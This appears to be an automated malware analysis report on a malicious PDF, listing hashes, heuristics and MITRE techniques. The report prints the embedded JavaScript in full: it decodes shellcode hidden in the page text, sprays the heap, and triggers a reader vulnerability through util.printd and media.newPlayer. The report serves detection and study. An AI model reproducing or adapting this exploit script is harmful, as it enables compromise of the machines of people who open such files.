Malicious PDF — malware analysis report

Static analysis result for SHA-256 841ef52378606861…

MALICIOUS

PDF

Size: 609.9 KB
Created: 2010-03-22 12:48:07
Authoring application: Scribus 1.3.3.14 (via Scribus PDF Library 1.3.3.14)
First seen: 2026-05-10
MD5: 5a2a31ab84a591e2b5670cbb8149a592
SHA-1: 4a8fefc99953ffa88b231e14ab4f3030ec5eaa3f
SHA-256: 841ef523786068616b12b1d137fba92792df94de7c5b47dda936414ec4aefe99
Risk score: 150

Malware Insights

MITRE ATT&CK

  • T1059.007 JavaScript
  • T1203 Exploitation for Client Execution

The PDF file contains embedded JavaScript that uses the unescape function and performs a heap spray. This behavior, combined with the 'PDF_JS_EXPLOIT_CLUSTER' heuristic, strongly suggests an attempt to exploit a client-side vulnerability. The script's complexity and obfuscation indicate it is designed to download and execute a secondary payload, though the exact nature of that payload cannot be determined from the provided evidence.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9136

Heuristics (5)

  • JavaScript action (severity: low, 2 related findings) PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster (severity: critical) PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched lines in script:
    }
    var Wo = unescape(shell);
    var yR = unescape('%u3727%u27f5');
  • Embedded JS stream (severity: low) PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact (severity: info) EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (severity: info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs extracted (each with the channel that referenced it):
    • http://www.monotype.com (Monotype)  [Referenced by PDF JavaScript]
    • http://www.monotype.com/html/mtname/ms_timesnewroman.html  [Referenced by PDF JavaScript]
    • http://www.monotype.com/html/mtname/ms_welcome.html  [Referenced by PDF JavaScript]
    • http://www.monotype.com/html/type/license.html  [Referenced by PDF JavaScript]
    • https://www.verisign.com/rpa  [Referenced by PDF JavaScript]
    • http://ocsp.verisign.com/ocsp/status0  [Referenced by PDF JavaScript]
    • https://www.verisign.com/rpa0  [Referenced by PDF JavaScript]
    • http://crl.microsoft.com/pki/crl/products/CodeSignPCA.crl0  [Referenced by PDF JavaScript]
    • http://www.microsoft.com/typography  [Referenced by PDF JavaScript]

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Artifact 1
Filename: javascript_obj0052_001.js
Kind: pdf-javascript-stream
Source: PDF /JS object 52 at offset 0x97FCA
Size: 1305 bytes
SHA-256: 4f93d2efd83b680305a7aec4ad5d3c398c80f49d351ba3eb200c665a9a19b9e8
Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 2 eval/decoder/string-building tokens)

Preview of the extracted script (first 1,000 lines):
function New_Script()
{
var ckWord, numWords;
var text = '';

for (var i = 0; i < this.numPages; i++ ) 
{
numWords = this.getPageNumWords(i);
for (var j = 0; j < numWords; j++) 
{
ckWord = this.getPageNthWord(i, j);
text = text + ckWord.toString();
}
}

text = text + ' ';



var k = 1;
var b=0;
var shell = '';
var shell_1 = '';
var shell_2 = '';
var u_shell = '';
var pos = 0;
while (pos < (text.length-1)) {
 pos += k;
 if(!b)
 {
	b = 1;
	if (pos < text.length)
	{ shell_1 = shell_1 + text[pos] + text[pos+1]; pos+=2; }
	else 
	{ shell_1 = shell_1 + text[pos]; pos+=1; }
 }
 else
 {
	b = 0;
	if (pos < text.length)
	{ shell_2 = shell_2 + text[pos] + text[pos+1]; pos+=2; }
	else 
	{ shell_2 = shell_2 + text[pos]; pos+=1; }
	
	u_shell = '%u'+shell_2+shell_1;
	shell_1 = '';
	shell_2 = '';
	shell += u_shell;
 }
 k++;
 if (k>3) k = 1;
}
var Wo = unescape(shell);
var yR = unescape('%u3727%u27f5');
for(i=0;i<15;){yR+=yR;i ++;}
yR=yR.substring(0,32768 - Wo.length);

memory=new Array();

for(i=0;i<0x2000;) {
	memory[i]= yR + Wo; i ++;
}

util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
try {var obj = this.media;obj['new'+'Player'](null);} catch(e) {}
util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());


}

Artifact 2
Filename: stream_000_off00000782.bin
Kind: decompressed-pdf-stream
Source: PDF FlateDecoded stream at offset 0x782
Size: 409280 bytes
SHA-256: fcb479a00bdf7c05a68b91ba89a8ea3dd2be027dcca112f1f26270c081dc3502